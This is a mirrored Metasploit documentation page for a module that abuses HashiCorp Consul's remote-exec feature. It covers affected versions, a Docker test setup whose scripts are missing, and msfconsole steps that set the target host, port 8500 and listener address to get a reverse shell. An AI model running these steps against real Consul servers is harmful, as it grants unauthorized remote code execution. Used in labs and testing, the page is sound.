CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/multi/misc/consul_rexec_exec.md
Views: 1904
Vulnerable Application
HashiCorp Consul with disable_remote_exec
configuration flag set to false (default configuration up to version 0.8, opt-in since version 0.9).
Description
This module exploits a feature of Hashicorp Consul named rexec.
The exec command provides a mechanism for remote execution. For example, this can be used to run the uptime command across all machines providing the web service.
The exposure of rexec service depends on the disable_remote_exec
option. This option was set to true starting from Consul 0.8, to make remote exec opt-in instead of opt-out.
Test setup
The following bash script can be used to setup a testing environment with Docker:
You should observe something similar to the excerpt below when running the script:
The following bash script can be used to stop and destroy all your consul containers (so be careful if you use consul containers for other things at the same time):
Verification Steps
You can verify the module against the vulnerable application with those steps:
Launch a Consul cluster with the provided bash script
Start msfconsole
Do:
use exploit/multi/misc/consul_rexec_exec
Do:
set RHOST ip_of_consul_container
Do:
set RPORT 8500
Do:
check
. The target should appear vulnerable.Do:
set payload
with the payload of your choosing.Do:
set LHOST 172.17.42.1
(docker0 gateway IP)Do:
run
You should get a shell.
Scenarios
Reverse shell on Linux host
Exploit running against a Docker consul container target: